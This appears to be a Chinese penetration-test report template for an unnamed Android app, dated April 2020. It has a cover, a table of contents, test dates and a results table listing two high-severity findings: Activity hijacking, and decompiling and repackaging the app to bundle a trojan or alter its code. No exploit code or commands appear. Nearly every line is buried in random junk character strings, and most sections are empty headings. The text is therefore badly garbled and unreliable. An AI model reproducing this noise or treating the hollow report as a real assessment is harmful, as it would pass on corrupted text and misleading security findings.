& y+ `& W2 G& u! ?5 ?$ N/ D% T o. j+ T8 j3 \6 _2 }6 N5 Q
: S ^4 j' x2 s; T
! P* B, x, b q& ~4 ]. e2 y! G% X
8 w8 o/ H# D, E) g+ K: h+ o5 Z* X% K- z' b/ c! h1 I& e. S
% R8 K7 }; D, \* U- X( m
, g. s1 @# _" F2 a" A
: i* _: {5 r( i) K2 J6 O5 v: C9 H0 M" L" D4 Q, \. }) w) v
7 F1 I! H! b9 D
- G6 b# z( l$ M" g9 ~' w: J6 v
文档编号: 5 k- ^/ O& D1 @5 O" r5 Z. S
. x# s) x3 N% P! C: I
( s2 ~5 q1 ~; I1 W" ~
$ @; i1 ^ Y& T2 R3 _5 i, x$ s7 J 4 K# y) i' I* z5 i
0 w2 {3 X% N: E$ L
* h; \5 |! D, A- n8 |
: V1 i b! S, C
- ~: m2 ~4 R9 a4 j8 L8 ]0 F* [
) l. {9 D: C& K0 A" \
/ E/ ~' l( g8 O0 s2 ^
1 K; f# {" ~8 P4 f8 G; X
2 W2 o( r( k6 B, S- r
& V4 y5 O8 S M' y( N
; V' Q$ {, D- V! L
; L* t3 c' o& x$ C n5 b
$ X! P- U- U8 n* A) u+ S9 S( j4 z" s7 j A }
! v- h7 B9 i/ W/ N0 ?9 r
' `9 A7 v6 J. R' z9 c' t
9 w" [' v( p; ?2 Y3 @: ^. |
# S4 ^8 Q5 r$ h1 W
; Z1 P1 h1 P6 W0 B3 w, b
: q. U, T. \( T3 U
( I$ `& Z) F3 ]- d- x. }. m3 V6 r3 `
4 M" p$ d, f E% `3 X
2 ^! B7 Q9 E3 { ; A! a. J0 {5 ^4 U
2 v3 p8 X+ r/ l2 h8 H& q" ]$ ?7 ^
3 A! ^8 R6 j$ z0 k- b; ^
3 |9 y. p8 M# @8 R6 r" Q
4 h- z8 Z& v5 V3 k0 n- ?
5 }, n$ L* f' s6 d& J* j0 o ; I& n# J+ c' @ f1 s
/ s5 k# {9 d3 A0 ~ 某某某APP渗透测试 * q4 q; x5 [' H' _
6 `- Y7 O4 L" f8 |( g$ q
& p7 \# |7 D" \8 l" a( [
9 G/ B/ _" \7 c0 K
7 Q+ [! S) l: Y/ W
6 W1 E1 l) L) | G$ c" y' q2 l7 \ 8 y8 z4 Q J8 H# ~: }
, d0 C: M! M1 B
' H( J% T, e! \
# v. r4 n, \/ F F7 N# |
! ?( X4 m4 V; x6 P# v$ i
]* O4 o* m/ j9 D ! R' N5 G5 S# [& ]! u9 ^4 W
- Q% q- @' o: k/ m" ~+ w
1 J; V; W2 D9 I6 z l. s3 z" b% {* s) r5 _3 Q$ I
8 F3 s5 p6 p- g) k% g7 m2 {, V" `
6 l# G: Y0 n# B2 [9 A
$ u! B# P+ m; p/ N
0 t+ k% B0 M2 p% Z4 p
# A0 R# y! ]( N7 K f, G9 {
7 A6 l4 W! A; N' m% @& T) L# S ; X# a! D E i
- f. R0 @* Q* L. W/ E% t3 O8 ~+ o
7 k( W& X: }% |
# h5 w: R9 q3 d. Q1 }) M* `
- `9 X2 z9 p7 z3 I. o8 Z: n* T( y+ L, Y- f v
- v9 x# A y: {1 j4 |! z; }7 x+ ?
技 术 报 告
7 Z/ r+ f) G; j+ k* I; i; B/ _9 U( p, G; O
% E! Q! e2 G' \) A9 Q) M1 G
- w a! R% M0 J6 H
1 I! e( |5 h9 M: u8 p
! g" l! h/ i3 K/ h. J& T: M
5 @) w2 h$ y/ `8 T5 k+ @ K9 D
. `! }) f6 K9 t; U+ _( Y
+ \; f3 n. W* w$ Z8 k }6 a( U/ v N
- ?: \) k0 [, I, ]/ t3 j
. |8 x' W, Q3 w2 y! D: S
8 K5 i+ Y" `3 G4 W& Z% r4 f4 t6 F* X' O) N8 T
% e, ^8 A. l4 d& F
6 I$ u) p3 ]. Z$ r" b9 x" ]
# d9 ~$ W# M: g
. |3 L* l# `7 J( k8 w1 C/ d. Y
$ l1 A7 ^$ J9 ?$ U7 K8 x" x
5 b; Q# b* Q& ]" t1 X8 W! ~
3 s. ?% a7 L0 q
; }, l! h; ^' M5 \3 F! k
8 \7 p7 f9 f; t6 U9 s" z3 _
) S2 D9 d2 K) p( i o" m) H
7 J6 Y9 i ^' K+ _) s& T* ]" }0 v) [; r& |/ u: N
0 S8 e5 h( {* f
3 A9 q7 W4 ]0 `1 J0 z5 O# t$ d3 Q; k
0 e. s% K* Q3 _! m9 e$ ~( k2 g; Y: u' p) P; S' b) v& K+ d8 r, {: E8 i1 L
) G- s, y8 t7 t4 @" V7 c% x9 Y) H% b I$ s+ C
% d1 p/ k$ J1 E" B2 v5 u1 R! Q/ ^* L4 M5 V, r
" L; d* p# x# G+ s; K- P+ r
% y" P8 c) G1 g3 h# T
D' g. |' u: U9 V X" N2 F4 Q: W2 l
0 I* a9 c5 z' _! Q
( I6 ^7 |9 x6 ~. D- `
: @9 l' }. D" Y n. q/ p3 ?4 B6 O9 {5 U O
' a0 x, ?1 c2 h% K6 O. ]8 T2 b
+ s* h( d7 ?; r, O# j w* K4 }" C0 @$ S& [$ q- ~* ^' [
7 t% x. k/ u' |* P6 Z* V
) l! V/ Z e8 h; d& b C
* A8 f3 V5 e4 t& G# A- I8 A8 S; g4 i$ ~2 O" j/ z
" F# F, [7 T6 G+ M+ s2 o" |& {7 J, I6 T- \2 q9 B( Z
% n# v4 _% T6 U3 t. @! x
# C% K2 T" d7 L
5 u6 I6 Z/ j) R" X" f6 U! @. i0 b0 a9 a. A4 F; t: B
+ Z; C( T. P8 `0 J( p
* y' e6 ?% U1 F; h) V" a1 W
7 Y: ^" j8 J9 t% y3 a
- v$ j5 Y3 R. k) v9 J; z
$ \4 J7 b5 ?0 n. N# s& {# l. z' U% P- M: V
2 w; {5 f7 Z8 U3 a7 m- z; d8 F$ |! z1 r0 e l7 D
5 w. q5 v. I' p5 G* g$ s
; d/ K7 s8 I& I8 x8 U
- ~: e- W) Q3 |$ I* o+ a/ T( {. o+ {& l% j6 C) {) U6 D0 B r
- `) k4 o- [* y: _2 q
. _- s0 m# p& K8 f+ }& r7 S& f
" M, w5 f, E8 d* ?) ?; P
3 r+ m0 F: Z6 y3 d. l7 r3 P + ]2 C, H2 b$ d8 E" R
$ A' I8 P" J$ {( A) ^% E9 Y
8 L% S# e6 @+ T2 w* K( w- T. O4 J, L9 d
5 M! M% A3 Z$ I
8 ~ L0 I2 h9 C+ G; C( o2 m$ k
7 k4 w* l+ _4 `/ `
' f; V/ K' Z5 R! _8 D* f$ ~
$ ?! e# P1 G) I% i1 D6 h
1 X& W) H8 Z0 T; I, }5 J& G
p) }2 d' F: ?$ p
- k4 M8 b+ O2 c: A/ D% {6 [' L8 o5 Y
' I3 w1 X. O0 H$ j; f
6 q& X- _+ O2 \* w d4 p
) {; F3 a7 c0 G/ Y k, a, a& [, k/ v, l# E% N' m- T: ~
% T0 ?; @# `7 c9 A8 C3 Q7 |
0 L+ V9 C2 w0 h: u" ~+ R2 p1 F0 b
4 r6 ]: M0 r' c3 U% I* M* M$ L7 q5 b& @3 O0 c* A$ ^
* s; M8 v$ j: U. P+ Y: D
! f" j0 J. H) y4 m# ]0 l' h+ y
- z7 ]4 a& R" L0 W+ K2 J
$ l' M8 F" G: ~/ s( A; ]6 ?' K
8 v1 Y" f) T. N: R6 o& O: {: k6 i% T* D/ N/ v! [0 z8 X( X. M
1 T% E/ Y3 \" H, G' C0 Y9 v5 y3 D
6 N; H1 W/ N4 P, p
5 t3 o& H5 O( u5 H; `4 x' w: y8 t. t# n ?+ V; k
- g- `# X- h( ~. Z% T& [2 t" `" D! N! O8 B
3 q; N0 P6 a$ z( `+ b: o1 J
. X! m% N2 b$ ^; `% j8 r5 M- L
- N# d# ~. A& C: I4 p- d
8 h* w+ @$ v3 B2 G
1 t7 M! [" a" j) f8 [, E% K3 [
4 g* w. p+ H9 p/ v4 B! h% z 7 \( V, e6 ~5 g$ R% _2 N
( l) k+ I1 X) k1 b6 ]) m
3 O& m) T$ o; ^+ M2 E( s; W$ c' |
6 c4 C8 b: w6 z! l; f" U ' W, X y- K" ?' p, z- r% K
. j/ I& f( u% x' \0 a: F; E0 v 二〇二〇年 / L2 x: `. e2 j6 w2 a. g6 d
g& z9 ^+ g8 {0 I- [
/ A8 p8 @4 [# }. S# M
/ Y# }0 e* [, O! } 0 H4 p3 W2 @. h- L1 m
( J$ O4 ^" f% F
, L2 b! ^: q, V& K7 }1 A
H Y# [* Z. g$ x* [4 P # O b K6 w( N
1 V# ]- s9 a! M0 y, s3 Y/ _ 9 L! l# Y# i; c1 u0 l
0 h& n9 J+ n' f% m
2 L: S+ _1 A C) z# @/ P$ ~$ ^* @0 E. b
: ]5 u- Y9 d1 U, C7 e5 P4 ^
8 V. y1 F; r/ K. N s: k# F7 W; M- V
& s' Y' m2 d2 D+ d1 s" e
3 j6 [* M: g: |7 m* K& M0 M4 e 6 z8 C2 j! {8 i& l
4 J2 y1 H2 P/ g- R q2 }! }1 [
# I; s! }' b4 r2 v7 s. R
$ Y8 k0 a$ j$ @6 z, Z& A 目 录 2 ^9 k% G( t1 W! l
: X: q) s7 C$ m% [) S: m
% w Z% H+ b6 [: H: r; Y! j
2 x8 s/ z- R2 L! L# X
$ s, T& ?' D7 t+ T1 m& k1 m3 W4 b/ X- k+ k
- X/ f# }1 b6 ]) p/ a& }7 C
+ ?, `0 s# t1 X
6 [+ [$ q' k3 e G5 J6 H% n% r3 u7 D& {
- E3 u% p& T$ G
8 x/ \) Q/ o7 u6 M% u
4 j" b7 z. I+ X: R8 x( a. H9 B% O0 T h( i' Y" X/ w
1 概述... 3
V8 h' G2 h5 k% ]3 x2 d# x
# O0 }# B4 c9 v3 w+ ?) @
0 u, R* x! B( Y0 N. `
9 N; t2 v7 Y. L# m# `' A1 ~ % f1 u8 y0 c& J+ q. t9 }# c K
1 \" `) T. Z; j0 [, t1 M 1.2测试时间... 3
, ?- |+ R+ T: J" C) C3 e) O( T9 h s+ }+ H4 P
" A) m' O& b7 s( Y$ C+ @' Z! U2 g2 Y. N/ V7 \0 U/ l4 T
* j, s/ v! b& @8 ?. k8 K9 o, Q8 @ Q- E# b9 o3 z! J* \6 y3 T
1.3测试对象... 3 ! J ^1 {! ^6 }. h
& v( }. I$ h) R5 ^9 g0 M0 b! G
& r8 G0 n0 r% F) U' B. D- T
2 s( i8 ^: n+ B$ @$ [0 T 8 L& B9 K) H2 ^- w% m6 p, T: D" V
1 N1 e$ x0 e3 ^
1.4测试结果... 3
+ c9 g/ B6 U. v: \6 k- Q% H7 C! ?1 e" \
1 T7 y) g. z& j9 W* R" y
! Q8 [1 j% E! G$ d+ { ; I2 _7 E/ X E3 u3 p' p
, ~( a" Q* X( N i) b4 N2 z7 P 2 检测结果... 4 : v9 G- `1 P1 ^: N. {, z& `% {
. s) n# U/ {9 _* y# _
4 v9 [5 W& ~$ D- k8 z
. H2 i _* o6 O: ~0 a( s
! J5 y/ u2 h& y% J8 D
# m3 p# N$ _, l" p* q 2.1 某某某... 4 1 f# Q) Y- ? ] ^, [# Y1 N
; b' a- p7 y$ A+ d$ d$ h
9 |, b- u0 @( y8 W3 t2 J$ `, y
/ h- D0 i1 x. t8 j; c' M
% r# X2 p6 E T- l. p4 s( f" L
" h5 E1 _7 m, _ 2.1.1检测目标... 4 2 a- ~7 i9 Q/ o' `# B! H
6 b% d/ t0 h w6 U& R3 D, m
7 l+ A5 V- M! O" f& ~. E% W: U% j4 Z+ o9 |
, h0 z& Z7 h6 I2 P2 w: U; L# }7 s2 g8 Q
9 v* L) V4 z2 ~, p8 O8 t# l 2.1.2检测结果... 4 4 |! D' m$ }! G
" W+ T3 Y/ C. h. K3 g1 J
( S3 N5 M8 t3 u8 d p2 m+ e8 G! i9 n2 [" ~& H7 D* q4 m
' d5 N: a% q5 \0 M4 `" a$ d
; Z7 S0 a9 a( T% Z$ ^ 2.1.2.1. 4 & A* O8 f$ w% m$ c4 Y/ H
; v# t) X" p/ a- l5 F# I
# Y6 x1 Y3 M' ^7 Y$ g
1 ^# |: ^+ P) O7 K6 q; n$ W * j* v' u$ s+ c& ~
+ @2 a% I) e# ^5 R) ?$ i! w! v
2.1.2.2. 6
3 j, l4 O* H' |0 j/ u
/ t$ \+ B5 C0 a7 s% ]# O
9 B; ?. }2 J2 O# ]. C& e0 m
6 w' a' t: {( T$ h4 N9 H$ a: h
5 ^. @0 ~9 e# q7 {$ D+ ^/ W. u; x7 a, L9 a& ^' K: n0 D1 K* S
9 P9 j( I1 [; o+ ?, g- y2 ?% _. b5 H* [0 Y: j( ^/ b
. r7 i- A9 h+ D# ]) |$ X" z
/ p/ Z* T1 e9 d
+ Q3 \; m$ F( |+ g( f: O
0 b, T/ H! E& D6 E0 ?1 r ( E4 X$ f4 Q9 D2 l4 W0 i. U
& X; W" {) l7 L3 s; p) H' r
" [+ f e* r# C8 g3 j2 p5 O
2 M9 j! w* Q5 f% w% h& I% W6 r
+ @) v9 k8 b/ p p% p2 e1 X! r
& s% k" ]3 V" ?4 U1 W' H8 Q , [$ \2 N; M3 U4 q) h4 X
$ A4 [& I" t8 ~
1 概述
2 u3 o: ^/ F, ^! |( q; n8 L1 F
& }$ a9 h* b. X& w, p* L. o
3 N+ E: u+ Q) b8 l: d, D2 e- ^/ _& I( F
! K: H4 n4 R6 [ x- @' Y% p8 \4 q. X% l D2 \ A
1.2测试时间 ' a( d2 N+ c1 s$ g: y1 S, D2 d
7 T6 o( N& g: t) V' g/ j
7 z0 t$ g6 y+ l1 t7 {; I
' a& w: N. M) z( U( X% ?2 e
3 L6 C- }3 U, q, u* m* c0 o2 m$ `8 F3 `2 `( I1 ?4 M
! [% n h @0 K ^7 Y8 k
- a* M$ T/ g: |9 ~7 [
- W, ^2 z& z4 h0 j' B" Z5 J& K/ X8 A; ?7 f9 u! g
9 {% F. O( s! ~6 W* Q6 l8 p8 t9 c
' \& y! S4 o5 w+ ?2 l5 n6 g
: u% ^. o. ?& V9 W& l# {4 u
0 g' j" B( J# Y8 E9 T 渗透测试时间
+ ]; M- m' s- o, F3 {7 t" d
$ V/ |0 o- E% s1 ]
, o! y+ e; T5 C- q, G( V# r( R; d7 |" s1 f2 C
| ( E4 l4 h6 ~! y
) h) d$ X; j/ s2 u/ F% A
+ K% U) e, b6 z, z& t( N2 b8 o! ~8 m7 B7 c7 S
6 {4 F8 R* @) T+ U* U. m
& x3 @5 s% A" m( @) J
" k5 K$ ]" ]& l/ p0 D5 ] a* E" C
' r3 Z7 j! \& V7 k' i; n' z( U9 \2 F# v
起始时间
8 j# V" j0 x3 B9 l( V8 z( M; l2 q
' O! W6 R8 _, R+ t9 O
/ Y8 o& u4 p0 y e& b, g3 m |
; \' X0 u% [1 D# f# f9 f6 T, s
V' Z8 i& h' _7 P6 K S! K: N ' r& e& B/ x: z9 T8 m
, X% Y! g7 g; L7 C2 Z/ ^
1 O$ g1 z1 t8 e1 n% E; z
* c4 A. `0 b+ K# C3 N 2020年4月6日 $ c# E; _) N% }7 `7 @9 F$ F
" x4 D5 s. Z% o; S
, G' k1 U1 v, c( n- J
2 g3 p, B) E% o" f& X; J |
1 M; N, b# M6 I6 |7 H1 l7 C
( g+ q; d' f* H. u+ C2 o: H
& A& T6 @' Q0 Z
* Z* c, G2 x0 \ t, Z, b) c8 Y7 m# m
+ s$ }. P, g/ b* x" X' l
4 q* N9 O, p6 T' c+ r
- e7 h% X% f* I, i0 g: S
, v/ x- |; ]+ N1 A$ ?/ \5 J$ w: o & F/ _. q0 A: T* I0 I* q0 ^' h
8 ^; Z3 h9 _- h/ d 结束时间
! ?3 D! i* L8 ], f! \
8 \. K( W8 l6 @
4 w. z" `+ |4 h
, A0 j: r7 X: m8 A: | | 9 ?+ S S0 @3 D, f
- X0 `. E: C# ?" Z5 U8 o& ^
2 h5 q; @; ]+ T, \3 g
3 @6 s! l# E. w/ F6 [
3 b3 p6 o) E6 j! Q
( F# d1 B! t6 ?9 k 2020年4月9日 3 q$ Y# t/ F: i- \$ c
8 n3 U5 s) u; u% i' a; t) _9 o
* k5 J3 _2 r8 F! s- `
+ R J& _2 U3 ^9 X9 U3 V; ~0 ^ | 4 k) B( [. f. M8 _: ]% h; q
5 g& a5 i3 r: [. i$ o v
4 d9 a9 x1 X8 J2 l# h
. W4 f6 p% ]/ t' } B- N) Y
$ o" j6 }, g9 i! a) P# I' L0 {4 z! g$ L" \
6 ~ O' ~/ u( Y4 @: m& C6 v( s
$ h) T* N7 a7 d! G2 T1 ~8 g- B4 c. C
% y+ ?, S, j# G: ^* a; k# x
8 q% u& o- @2 R) v" I4 e 1.3测试对象 ' V8 X2 M+ b* B9 T& @
" f: b, |: T1 q5 x
0 n# X4 O \$ N0 x" {0 a6 N/ q( k: x
1 {) f. d+ A5 B3 v) ^- U& s
! X! g; A! W: {. ] 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
0 y% f9 {( P- _% Q
! x9 X% h- R& o9 X
7 G G- Q" g: |+ o8 l, } n" ^8 H$ N* v
$ y( f* [5 M( D$ C& n
+ C" P4 W3 D) U6 O6 R7 P* D# v 表1-1 检测对象 8 F/ r( p. ^7 ~: H$ q- \
, w8 Q6 {( M/ P' [% n! Z
, ~1 ]1 L0 Z" X& b, F' R
2 z% H# V8 `5 s+ t5 J$ Q
6 i y, K, X1 y$ t5 N
n4 D+ a4 e0 K& O( V 4 Z8 `5 Z& U- f; u6 h, S
) B7 f* \3 J9 Y6 d: s- Y4 n3 O) d
% _# P- [+ S% L
6 s/ N: e! C' X4 l; k6 ?4 \ ( l+ j [6 V; w9 I
" a/ Z" Y& o: w7 U% E$ {( o" e
& ~, W. K! ~+ L5 }- C
0 M$ N( _3 e6 H1 n 序号
# Q; s/ Z% z0 q5 R: H# B
* w/ ?0 I, f2 y: R9 P$ J& c
* T# R, J, n3 E3 H7 ]* }, E: n& R* C4 W: x
| + v3 h1 d1 g0 U$ B, M& R( B% C
* L* ~/ \3 _3 y& q* \
; e6 o+ \ M' Q1 \1 i* L5 {1 @$ N4 r3 x/ x
8 u% h9 ~. p) c0 m
5 p* e& y5 O( P* M# o9 q
测试对象 + W! o3 S7 O3 H6 Z& n8 B
# N4 y$ q/ l' N) u4 |: U# }. B
! \8 D/ T8 P' q& a) i7 o+ p- y# D
# [: |' p9 t& x/ \: ]1 @5 p; j2 ~( A |
. A0 L) x, n) _' q$ A- ?' J$ L' \( I& ^. d+ b* [
+ _3 h! U! b% l) b3 {2 W$ B# E, a3 g5 m! i$ c3 c; m/ l! z
( y( S& V+ b& v7 N
: \* R( P& i9 C2 \ H% Q2 J
测试地址 + z7 N x( M. B# r2 Z% ]7 v
2 X7 F- y" C3 _% B# ]) z 4 m% P$ I8 T5 |/ `
! V) a) p- x8 y) \. ^
|
) ~ j" s6 g& f, S! u" d" I& B- |9 D% a7 k! D$ v3 I G3 x+ u
2 ?1 E" w& y1 a$ K8 u: b+ V4 M* Q+ }/ a, F3 K- b" S% `
( W' a+ Y1 f1 ~7 W) S6 d: x8 ^# M! Q% d/ R2 B( c
安全漏洞
" v! C8 v: P. i
; q, c( u) z) M8 q
6 l) V' F3 c( G" r9 b$ U1 \) K" M9 \2 N5 z; e
|
. [- v2 `' K( n6 h* T! E. ]% w4 r
6 @* d3 O6 h5 A: h
2 E" `1 \% O w# m: N S
% t# A; W+ n2 R* k2 `) ]. F
( K' m) Z3 W9 M/ ?2 C9 |$ \9 _6 X0 u; r& Z
- U% f( C' \3 q! C' _
" v9 X% S1 Q$ `1 n4 b" X - J9 K% ~4 ~4 r4 \; O
' l) `" F$ V Q0 m2 F- W
1 ! ~- d! |" p) n
# I! k* D" O; s& U
, T9 p3 v& s8 @! u
5 f1 l' {# o" ^7 I2 L: w | ) [5 H; \: W8 M
# q7 H( {$ |6 P- n
' c! B1 U$ E" f0 `6 u" I9 P. R4 {6 _! L2 v$ ~" \
) q( [) V, P5 z/ ~, @9 J
0 k& q ]# y. }; v
某某某安卓APP
; u7 U( [2 M: M& v6 s' U6 x
" r1 D# E5 p/ X n& D
5 c0 Z) }; Q9 @: P1 t
( Z) _! g/ q( S0 D5 y7 ^" J |
3 W7 `" c. G% I& X0 I. P4 G& s2 G3 t1 \( s
/ O. o! x4 ^" ^) B5 V. S0 s
' c& `2 d& w0 }4 ] p3 o: Q. }% I) Z) K5 ~/ c3 c
- ^) i% _- H% z( {2 v 1 g& L; }3 ~, Q6 s0 \ `
. B/ X5 `/ `0 T3 { 8 z5 e6 g) I N. [5 [- U; r
: }+ p$ P1 Y2 e: z/ g4 x/ W( D1 Z
| " |9 K1 c9 R7 S
2 @- d. j5 c( l, l
( i$ ]2 J& V* A) B
+ R" \9 M1 U! n: L4 q
7 x6 M2 j4 s. r$ Z
* m d4 N4 ]: {" Q' H' e0 B 2 % ~! \1 }, p) J% r
3 f& f+ O% |3 s+ l' c* l
6 L+ k$ Z6 l* `/ }* q3 f" T
; J8 J: |8 |9 x3 s8 m | 7 F+ m1 O& _+ I
" M5 p1 a/ r4 E5 `
: Z. [2 e* W5 m: C* w7 q/ P$ q
$ i8 n! F+ l- i% n
6 F% `6 I* W! p0 Q) c
0 q$ I) {; r/ a4 [5 e
3 ?& w7 G- X; t5 f- x6 F# u0 E9 H
% q# K& \. s$ H
. x( S# v F4 K; d4 I
- U7 C7 S: D5 s- @5 B
1.4测试结果 | Q+ i, e8 V- l) L9 d
7 h! u! t" O; W- m' U9 Z
1 u& e$ j) F' e0 y# t
7 D6 e L/ B; A. e, S9 Y 8 Q) A4 e5 A8 P; g# R1 o
$ Y. i4 L+ w4 \6 i% k& U+ N: D
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
# y! J5 j/ H' i6 \* i/ c6 z4 ?$ Q: y3 n8 \: Z
\$ B. f% `- w; n/ W. n" f2 V5 \7 w+ h8 t
0 a$ c$ n4 o3 R
7 ?" g# O0 @6 Z+ m& }* _
* H/ B: U" `7 ~: w* j: b8 }
7 C- M8 ?5 D* ?1 b/ u
9 Q8 U$ }& J: B( f
; w) C4 @" U, S ! Q- _ m9 n! t* h4 r
3 ?, m- p0 [! O$ `
9 ]$ [% m( u; V @5 g. n& x- K/ X. y
) h4 `0 p. ]5 n F' Y8 W& L8 H- `1 [* G, u/ S# _: F1 B" ~& a
# X* \ x/ M% X8 e2 D# H5 B0 Y! i; i" ~( X( Z8 r) Y
( N8 {+ d: L$ }! l" I* Y0 T7 ]! ]
6 b6 h8 T) O- l% }- G* ~; T8 y ' i, y0 i6 l+ M# `
) `5 v Z7 z" [4 D$ N9 v! c* b
序号 6 S% W$ \8 l& j5 `
. g6 c% f) D! p/ ?
' k6 ?5 ?, a. h
) \+ n. d- d% z/ h; g" p |
3 V% u+ G5 U7 I
) h# u; X, y9 s & l6 t6 q* S: _; {6 }3 n
6 }& v7 }" l7 S0 S m- g4 A
: B+ H: S$ j. V% N; j X% b
! ~) `+ A% z8 |+ @7 C' d( t' q 系统名称 6 B% _7 L4 w5 s! h0 V5 b
9 I8 ?6 K: X! R, c5 x& ?- a. \9 K
( p4 ~ O# }3 M2 H+ P7 L1 ?0 R1 l5 Q/ Y1 A
| " k/ F: ]; i& k" s0 \0 e4 W% m$ ~
; s3 J5 U' _$ P5 V% f
/ I$ p! P# h; ?' n: F% {, m! n* X
- Z3 j, s+ v! Q 2 ]# K2 n7 _8 }1 P1 C- n' D. L
( r) Y) g' m6 z1 i0 }1 B/ N1 } 漏洞名称 8 c: ]1 o* W1 W
; T) |& ]' I9 c7 M0 I0 Z
! E! k4 F7 ^* S. C: g A7 M4 q$ i. G; P/ i/ I
| 3 J5 o: _6 U) R0 T4 c3 B
; \9 e/ }5 x, F( C+ g % D$ o3 Y+ P5 T$ n
% I& S4 N& I" ` 6 ?8 x6 S$ H9 @/ r5 f% o
! u1 ?. @ p# F/ ^! ~$ c! M% U$ W
漏洞危害
2 U# ~! z1 N* _7 L
0 }# J9 o- K# f% k b 3 Y! Z7 }5 `' U! y
& h) U* S6 @1 X | 0 x4 |+ a' o; \) A+ I
$ ^ I0 l+ U0 H2 \( Z1 c# I
! ]' Q: C: E$ z+ s3 ~
4 }6 l3 b" e* W. o) f" ?
' v# D* O# {9 s9 F
: k' w3 y% w4 v A4 j9 `9 s1 Y 修复结果
}8 f, l: [6 a$ u) o1 A$ L& I4 K2 ~5 C/ `# a3 ]: M U
1 i9 x+ A0 [, `; A2 d; O- z$ u5 F/ f
1 _& W7 z( }! H9 [! ^4 J
| ) O# U7 P7 \9 U2 j
; c8 l7 D4 M' V
* i, q5 z5 O* X- g# q) y. {' w/ b+ z( |) W
3 q- K6 h+ |4 G& ]+ C: ?* }$ ], R9 a% `$ K/ p$ q
# {- o( C! o4 h3 Q! [
6 V8 u0 S* s* c0 _* o* M, p
. _/ J. `% K5 X4 {) S" \! r" w2 o1 N
1
# i0 I0 h3 M1 }0 _/ ~ G4 I
9 C3 T0 g7 l5 o+ L$ S$ ] . `2 U! Y$ L* j* u8 u* W3 P
4 [: O/ A' j2 c+ j( ~5 H" [ |
/ x: { }( U/ ~+ p1 v0 S+ e% t5 L9 V o5 l; v& _; u. n8 v' @
9 ?9 A- V4 D2 N4 w6 S
. K0 ?; g1 W' D9 v1 G5 T/ C 7 R& _+ A; ?/ U+ }0 F6 S S# @
+ o0 d4 o! H9 h7 h, W! [+ y 某某某某某某APP
' ? A1 `$ C% T3 p- F9 [! g% z- K% T* M
8 D+ i4 ]# x0 l" b7 X% r
3 P: ~% M: ~/ H' v$ B' c( r |
! M- M% j9 j/ J1 t6 X
" P F5 x: b. s 7 Q/ z8 O5 A# i( r. ^: r
- G- f* v7 z' A7 N d9 L9 d $ ^/ X9 A7 V0 j* F8 x
, ^3 k. Q4 r* h/ a4 f" P Activity 劫持
$ l& B9 v* Z- w2 Z0 Q' k! R: I0 Y, m. u' o
4 H/ o- D" U& i, S" w8 ~
1 m' U) }* A. S) e
. ~( t! {/ ?( m5 K; N& R4 ~$ w" ^
) j3 I3 c# g4 T. ]
, N; T1 f+ _# u
3 ?- k4 v: U+ e 0 l7 G1 \( l, f N( ~1 o" t u7 a
: j2 p' P# L5 @
|
; ~9 q9 Y7 W M2 C
: J$ w @# S# s" M2 E
5 p3 ~" d5 V1 k& B% q$ Y2 ]5 e- M& \% c0 r/ U
# b2 c% ^" n1 \% g8 a1 V
/ Y+ k ]0 h7 |0 w, v 高
2 Y0 Q& t) \0 r' A5 J( S5 b5 [8 i( K3 i ^
[9 c- H* W& K8 J; r
7 h) o' o& g7 W( t$ L |
1 E) c, B% R/ R! d8 o9 z- Z) z6 V/ f% U; V: s
3 o9 k# o r" g- `; H- y. n3 U# _% _2 R* V9 ?3 A
! d1 f2 h$ R0 k2 e( |, ]/ B6 H) l
% u$ Q, E5 k' |% t9 R5 b- H , ?. D) i9 y/ D4 R
' X4 `: g; F1 [6 U o* j4 |6 l
. ]4 y4 ^( n$ s R
) J' b, Z% K3 w; |: q" z$ A; k* p g
| # `* I5 K# t% T# M* {$ {7 J" w# K
5 U- [ b; C `4 L% j2 Y( _6 x
9 D1 U+ [+ z0 _0 _' Y, ]0 _
2 m) K8 f) q3 w( |- A6 Z& k" i3 t + v, q R) g" r1 w
/ n+ z P3 G2 l. M. ~ ( S4 D9 u; F2 L3 f- @, m1 I
8 a% @% l M5 b# X, i
: o% b8 o9 H5 x3 Y# N% Y: C2 X- b) s+ `5 r+ p8 v4 l
2
9 a$ }( n. a4 ]5 |, ?5 ~; s4 x
3 k/ e; Z, p0 T8 F) H& P) a, k5 t # W; a( s/ U1 C+ V: d3 @
* F M8 h: }. g; u. c% M, J: ]
|
* }, j* K+ `$ ^0 |! d# ~& z
. @" t& V% S7 p
+ J) h7 U: p2 F2 m) Z* D; b* M" Z
M" w! G$ s+ d, _! W ! l: Q# G, B) Z0 \1 S
2 W5 D- ^5 I- [8 j$ g
某某某某某某APP $ A+ T( V7 n: ?; i: o
# S& y" i$ X" M, G a2 S9 f
- p# j0 h4 R i+ q% A. B6 Q9 j, e" _7 A& O8 P" F
| 4 o3 g3 f: f4 y+ _0 G
/ K: W# O1 B3 M% j' d5 k: C0 u& e . K5 Z- l$ E3 t
' j- }. q7 { ?0 N5 v- G J8 a
: r" y, {0 W' Z5 n+ l/ I5 V1 r o$ N$ I. o2 `( a
反编译二次打包捆绑木马、篡改APP代码 0 k3 k, X: K6 j5 z
' e; |( h/ @* ]8 X R
* }. |- F6 j$ v& v# L7 f3 _ }9 \9 R' O2 h8 t% J: t" M
|
6 L9 I# u! T+ |. c
: U' A4 \' L) q 8 N8 ~! o; Y; J+ ]6 R: u, c9 n# M
* ~0 ?& ~/ x+ Y. W6 h& ^ & M; K5 n* l @& j0 h6 _; Q) n
5 ]& f0 @ D3 E% J e3 b3 A 高 x/ Y) W2 j: f2 X: q
$ C$ l5 ?! C7 @$ F& s( D6 `3 {9 L) ] . ]/ z/ s% x9 [5 U* f2 Z5 s, [7 O$ t
4 X, q$ Y3 R5 v$ ^ M0 t |
r d5 k- E- t) ? m9 ~- Z8 Y' I4 A9 o8 K
' n# F G% [ t: V
) c6 V. p/ Y( z: E
3 A. Y2 c5 v, u+ x2 ^) u% h1 N7 [7 m. T+ w" S% b0 @
7 E( c7 I: T% _! U* U1 \
( i4 S# m. f, r. b! t3 h* O
, f0 x7 m: Z0 m+ V
8 v+ w: |! o% ^: {5 ` | 3 \. H) ]8 A: ~
U& z$ k5 T0 b- S
- c8 ?8 Q, z( i; G B3 P' {7 \4 [
! \% o! S5 F) g6 J/ C( t
4 I ~! ^( i$ t0 n) H) u X$ U) A0 r. [' x6 m; z7 g
; _, h# z9 N6 a2 a6 z# d
+ X( z A* @5 Y2 R( e; g ) V: I4 i5 {5 _, Q% i" E# U- f
